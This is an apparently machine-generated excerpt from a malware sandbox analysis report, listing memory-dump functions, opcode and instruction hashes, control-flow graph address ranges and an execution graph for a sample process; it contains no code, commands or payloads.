                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FFD9BADC678 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction ID: b32eab7c9bc4b7e74645761e53194022764afd2861dcc3217c0a303523c631e1
                                                                                                                                  • Opcode Fuzzy Hash: c6f8a706cbd772b155944279ffe8a3f2cffa48fa2b7bee167bf78b64a5f12c82
                                                                                                                                  • Instruction Fuzzy Hash: 07D02230B508040FCB0CA738885C8303390EBAA20278600A8D00AC73B1D96ADC88CB80
                                                                                                                                  Function 00007FFD9BAD7DC0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction ID: 15b43eca4ff2acd1d2eced378d129677e904d30cf21e5492986ab00f519a9323
                                                                                                                                  • Opcode Fuzzy Hash: 1e116b91c9d63e8cb3e7de1cd9288fd58b425d35437b3874e7b0b5ea6d6322c4
                                                                                                                                  • Instruction Fuzzy Hash: 77D01234B619044FC71CB738885987473A1EBAA216B9541A9D00AC72B1D96ADD89C741
                                                                                                                                  Function 00007FFD9BAB4080 Relevance: .0, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c405b05fdfbe4165b7a88bdd7db18eba14fa53fee58ea56b6795c1e173da9a0a
                                                                                                                                  • Instruction ID: 7bedebf16a930345efff0237c223a80bd3713e8a3c91020b9832b69c416a0a52
                                                                                                                                  • Opcode Fuzzy Hash: c405b05fdfbe4165b7a88bdd7db18eba14fa53fee58ea56b6795c1e173da9a0a
                                                                                                                                  • Instruction Fuzzy Hash: 56E08C32E0440E4BEB18EF94C461AFD3BB1AF48304F40013AE029E62E5DFB428818B01
                                                                                                                                  Function 00007FFD9BAB47C5 Relevance: .0, Instructions: 14COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction ID: 693cc6325eff473f90e08535aeacc7b152b97be437aed018cb3775b3459b9de1
                                                                                                                                  • Opcode Fuzzy Hash: d34d9375b611b996318a395ba4af66737237af83ea357c991f98737d4e71250a
                                                                                                                                  • Instruction Fuzzy Hash: DDD0A730F0881F4BE659EF48946426A6251FF44300F120039D81DC3167DE34E9118A40
                                                                                                                                  Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Function 00007FFD9BAA12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Function 00007FFD9BAC5A90 Relevance: .0, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction ID: bdd98c863e0162ae75f8e14699de8453af00b9b37c7f4702c9b7186f81107286
                                                                                                                                  • Opcode Fuzzy Hash: 6d37d5abdadc2e2e799eb191ad3f1425ddb310326d155c93511a588fff0db703
                                                                                                                                  • Instruction Fuzzy Hash: 64C092306118088FCA44FB7DC88994037E0FB0E205BC50080E40CCB270E26A9C96CB41
                                                                                                                                  Function 00007FFD9BAA460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c349dc12a499adf949896fc33ec4b30e8c824b35018b78ca43193ab54f3753cf
                                                                                                                                  • Instruction ID: 4ca7060295ed86bba127f4d5102b666ca9ffd9497285361174d5cd56f8599d01
                                                                                                                                  • Opcode Fuzzy Hash: c349dc12a499adf949896fc33ec4b30e8c824b35018b78ca43193ab54f3753cf
                                                                                                                                  • Instruction Fuzzy Hash: A3C08C01F0C85A12F21922040422A7D04024F4471CFC80034F00EC72CECF5C5A0242C6
                                                                                                                                  Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277
                                                                                                                                  Function 00007FFD9BAB9595 Relevance: .0, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction ID: e3ef123d9a2e456fd85f6baed8a656f05d0499f799ba2a21d6a2caedea0dda8f
                                                                                                                                  • Opcode Fuzzy Hash: c4335748156f765de31ba137da35eda4b86e70c92f16d18bbbf842374232bb6d
                                                                                                                                  • Instruction Fuzzy Hash: E4B09224A0911A8BE7209B8084303AA22429B44310F224431A82D832DBDBA8A90086A1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:5
                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                  execution_graph 34703 7ffd9bb150a1 34706 7ffd9bb139a0 34703->34706 34705 7ffd9bb150cd 34707 7ffd9bb139a9 CreateFileTransactedW 34706->34707 34709 7ffd9bb17d3a 34707->34709 34709->34705

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BC31853 Relevance: 2.9, Strings: 1, Instructions: 1622COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 21 7ffd9bc31853-7ffd9bc31894 25 7ffd9bc31896 21->25 26 7ffd9bc318a1-7ffd9bc32701 25->26 180 7ffd9bc3277f-7ffd9bc329a1 26->180 181 7ffd9bc32701 26->181 201 7ffd9bc329a6-7ffd9bc32a1c 180->201 181->180 205 7ffd9bc32a1d 201->205 205->205 206 7ffd9bc32a1f-7ffd9bc32a22 205->206 206->201 207 7ffd9bc32a24-7ffd9bc32aaa 206->207 216 7ffd9bc32aaf-7ffd9bc32b25 207->216 220 7ffd9bc32b26 216->220 220->220 221 7ffd9bc32b28-7ffd9bc32b2b 220->221 221->216 222 7ffd9bc32b2d-7ffd9bc32cbc 221->222 242 7ffd9bc32cc1-7ffd9bc32d37 222->242 248 7ffd9bc32d38 242->248 248->248 249 7ffd9bc32d3a-7ffd9bc32d3d 248->249 249->242 250 7ffd9bc32d3f-7ffd9bc32d90 249->250
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2953734608.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bc30000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-3993045852
                                                                                                                                  • Opcode ID: df4e2930f8d5d0999a86536d8567d0b79b774a7f3718899790011658c67b247a
                                                                                                                                  • Instruction ID: cf8984d54fc2edd223ff7b050d2047c4c01b9f2e35a64af14e06740e7118d59b
                                                                                                                                  • Opcode Fuzzy Hash: df4e2930f8d5d0999a86536d8567d0b79b774a7f3718899790011658c67b247a
                                                                                                                                  • Instruction Fuzzy Hash: 54D29270A1DA5D4FDFA8DB58C8A5EA4B7E1FF68750F4441E9E05CD7292CA34B980CB02
                                                                                                                                  Function 00007FFD9BAE0566 Relevance: 2.0, Instructions: 2033COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bae0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a4951b735ace051eab122f43da12ecd0e16ed6e13c117ed7bef335f9148c256
                                                                                                                                  • Instruction ID: 0e642f0a9c389d69d752b9e707480231c3e7a2c23295174c5f85b483d419efb0
                                                                                                                                  • Opcode Fuzzy Hash: 3a4951b735ace051eab122f43da12ecd0e16ed6e13c117ed7bef335f9148c256
                                                                                                                                  • Instruction Fuzzy Hash: CFE2D431B1991E4FEBA8EB6884A17B873D2FFA8340F0546B9D44DC72E6DE64BD418740
                                                                                                                                  Function 00007FFD9BEC4880 Relevance: .8, Instructions: 850COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68cf1cfa47445aaa70b69e5e342ef8abe6a590c21a1dd43d87e160f4b37953b0
                                                                                                                                  • Instruction ID: e90bb2e19dc393104a970d0e3b8921f0bc8a727d7e8c24c1eb85243befdc3e1d
                                                                                                                                  • Opcode Fuzzy Hash: 68cf1cfa47445aaa70b69e5e342ef8abe6a590c21a1dd43d87e160f4b37953b0
                                                                                                                                  • Instruction Fuzzy Hash: 4642E730A0D65D8FEB68EB58C8A5AB877F5FF55310F1101BDD04EC72A2DA25AD42CB81
                                                                                                                                  Function 00007FFD9BAD0D74 Relevance: .3, Instructions: 257COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b9f900adf313e4f9a7f494a102e89cb5b98a40747b7533546ef55a3fa680e9b
                                                                                                                                  • Instruction ID: 0110353d0a65804baa4af2e15cb1a3a38f8d3ffff1351159e4c3a76eeedf65c8
                                                                                                                                  • Opcode Fuzzy Hash: 2b9f900adf313e4f9a7f494a102e89cb5b98a40747b7533546ef55a3fa680e9b
                                                                                                                                  • Instruction Fuzzy Hash: 2C91B272A18A9D4FD798DB6888797A97FE1FFA9318F40027EE059D72D6CBB81401C740
                                                                                                                                  Function 00007FFD9BAD0B3F Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction ID: c8b2876f24e66c58ff6c243e4cc2f73b8dee7b4830f7dfc600d1b3de266f8ca2
                                                                                                                                  • Opcode Fuzzy Hash: 64ff31ec06f725775a5d2fd6173b8c9ac953bee29ac4c996ee5a9d43c924c097
                                                                                                                                  • Instruction Fuzzy Hash: 1001263632A95A8FC702AB7DE8914E8BB50EA83132BD602FBD044CB1A1E311185EC7D1
                                                                                                                                  Function 00007FFD9BB139E0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bb02000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                  • Opcode ID: 323f72a4f40193b9a42bf5094cde106226ae92ec55da6545f4f65ae60719d9b4
                                                                                                                                  • Instruction ID: 3c100b8d378680afd2597fbf487630aebb66a749dd3a258c93e406dbf85f4cc9
                                                                                                                                  • Opcode Fuzzy Hash: 323f72a4f40193b9a42bf5094cde106226ae92ec55da6545f4f65ae60719d9b4
                                                                                                                                  • Instruction Fuzzy Hash: BD51147190DB8C8FDB28DF5CD845AA97BE0FB69314F1441AFE089D3292DA74A840C782
                                                                                                                                  Function 00007FFD9BC3186A Relevance: 2.4, Strings: 1, Instructions: 1153COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 255 7ffd9bc3186a-7ffd9bc31896 258 7ffd9bc318a1-7ffd9bc32701 255->258 412 7ffd9bc3277f-7ffd9bc329a1 258->412 413 7ffd9bc32701 258->413 433 7ffd9bc329a6-7ffd9bc32a1c 412->433 413->412 437 7ffd9bc32a1d 433->437 437->437 438 7ffd9bc32a1f-7ffd9bc32a22 437->438 438->433 439 7ffd9bc32a24-7ffd9bc32aaa 438->439 448 7ffd9bc32aaf-7ffd9bc32b25 439->448 452 7ffd9bc32b26 448->452 452->452 453 7ffd9bc32b28-7ffd9bc32b2b 452->453 453->448 454 7ffd9bc32b2d-7ffd9bc32cbc 453->454 474 7ffd9bc32cc1-7ffd9bc32d37 454->474 480 7ffd9bc32d38 474->480 480->480 481 7ffd9bc32d3a-7ffd9bc32d3d 480->481 481->474 482 7ffd9bc32d3f-7ffd9bc32d90 481->482
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2953734608.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bc30000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $
                                                                                                                                  • API String ID: 0-3993045852
                                                                                                                                  • Opcode ID: 7cc5a86c9963156eaad6119cc1debdf6f2f993b46eedba10eebba0b641255085
                                                                                                                                  • Instruction ID: 1c4baf02be0fc722dcff2c86a7e91b021e1f0c77aaa57d6dcdbfc3b498885bfd
                                                                                                                                  • Opcode Fuzzy Hash: 7cc5a86c9963156eaad6119cc1debdf6f2f993b46eedba10eebba0b641255085
                                                                                                                                  • Instruction Fuzzy Hash: 06929271A1DA5D4FDFA8DB58C8A5EA4B7E1FF68750F4441E9E04CD3292CA35B980CB02
                                                                                                                                  Function 00007FFD9BB13990 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 892 7ffd9bb13990-7ffd9bb17cb2 898 7ffd9bb17cb4-7ffd9bb17cb9 892->898 899 7ffd9bb17cbc-7ffd9bb17d38 CreateFileTransactedW 892->899 898->899 900 7ffd9bb17d40-7ffd9bb17d6a 899->900 901 7ffd9bb17d3a 899->901 901->900
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bb02000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1aefe141133255c3e5d18b9271974537e11d0c27aaf804ed068dca271ec19b63
                                                                                                                                  • Instruction ID: 6f54a54e0d61148d7625eac6a6f9669a71a36074d5fc0f68252f26333b39c215
                                                                                                                                  • Opcode Fuzzy Hash: 1aefe141133255c3e5d18b9271974537e11d0c27aaf804ed068dca271ec19b63
                                                                                                                                  • Instruction Fuzzy Hash: 2B41C37190DB5C8FDB68EF5CD845AA97BE0FB69314F10426EE089D3252DB74A841CB82
                                                                                                                                  Function 00007FFD9BB139A0 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 903 7ffd9bb139a0-7ffd9bb17cb2 908 7ffd9bb17cb4-7ffd9bb17cb9 903->908 909 7ffd9bb17cbc-7ffd9bb17d38 CreateFileTransactedW 903->909 908->909 910 7ffd9bb17d40-7ffd9bb17d6a 909->910 911 7ffd9bb17d3a 909->911 911->910
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BB02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB02000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bb02000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bdf91e21e5397c94a8c0e11fcbca4b2882503cb6b03e235f815f9a60a0f067f4
                                                                                                                                  • Instruction ID: 0eac135e8313fd7b05b50b6b4159dac3adc83395c2ad911b79732bade4c24de5
                                                                                                                                  • Opcode Fuzzy Hash: bdf91e21e5397c94a8c0e11fcbca4b2882503cb6b03e235f815f9a60a0f067f4
                                                                                                                                  • Instruction Fuzzy Hash: E841B47190CB5C8FDB58EF5CD845AA97BE0FB69310F10426EE089D3251CB70A841CB82
                                                                                                                                  Function 00007FFD9BEC6908 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1026 7ffd9bec6908-7ffd9bec6920 1028 7ffd9bec6928-7ffd9bec6953 1026->1028 1032 7ffd9bec697c-7ffd9bec6982 1028->1032 1033 7ffd9bec6989-7ffd9bec698f 1032->1033 1034 7ffd9bec6955-7ffd9bec696e 1033->1034 1035 7ffd9bec6991-7ffd9bec6996 1033->1035 1036 7ffd9bec6a65-7ffd9bec6a75 1034->1036 1037 7ffd9bec6974-7ffd9bec6979 1034->1037 1038 7ffd9bec699c-7ffd9bec69d7 1035->1038 1039 7ffd9bec6883-7ffd9bec68c8 1035->1039 1045 7ffd9bec6a78-7ffd9bec6a8a 1036->1045 1046 7ffd9bec6a77 1036->1046 1037->1032 1049 7ffd9bec6a58-7ffd9bec6a5d 1038->1049 1039->1033 1043 7ffd9bec68ce-7ffd9bec68d4 1039->1043 1047 7ffd9bec68d6 1043->1047 1048 7ffd9bec6885 1043->1048 1046->1045 1050 7ffd9bec68ff-7ffd9bec6906 1047->1050 1048->1049 1049->1036 1050->1026 1051 7ffd9bec68d8-7ffd9bec68f1 1050->1051 1051->1036 1054 7ffd9bec68f7-7ffd9bec68fc 1051->1054 1054->1050
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                  • Opcode ID: 1cbd88666a4a0c4c8fbdb5f5c8134e2a8c24e98c790e8648e09966cdba38dc88
                                                                                                                                  • Instruction ID: 1d2a95d30590eee6821f965c4d966fe581af2dbb3dc1002f8c38fe44ca83d923
                                                                                                                                  • Opcode Fuzzy Hash: 1cbd88666a4a0c4c8fbdb5f5c8134e2a8c24e98c790e8648e09966cdba38dc88
                                                                                                                                  • Instruction Fuzzy Hash: 01415D31E0A60E8FDB59DBD4C4619BEB7B5FF58304F11417DD01AA72A2CB3A6A01CB00
                                                                                                                                  Function 00007FFD9BEC18B8 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
